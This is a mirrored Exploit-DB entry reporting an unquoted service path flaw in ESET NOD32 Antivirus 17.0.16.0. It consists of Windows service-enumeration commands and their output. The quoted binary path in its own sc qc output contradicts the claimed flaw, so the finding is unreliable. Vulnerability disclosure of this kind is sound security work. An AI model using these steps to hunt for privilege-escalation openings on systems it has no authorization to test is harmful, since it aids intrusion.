1

[local] ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path

 1 month ago
source link: https://www.exploit-db.com/exploits/51964
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path

EDB-ID:

51964

EDB Verified:

Exploit:

  /  

Platform:

Windows

Date:

2024-04-03

Vulnerable App:

# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Exploit Date: 2024-04-01
# Vendor : https://www.eset.com
# Version : 17.0.16.0
# Tested on OS: Microsoft Windows 10 pro x64

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """

ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET
Security\ekrn.exe

C:\>sc qc ekrn
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ekrn
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"
        LOAD_ORDER_GROUP   : Base
        TAG                : 0
        DISPLAY_NAME       : ESET Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

OS Name:  Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK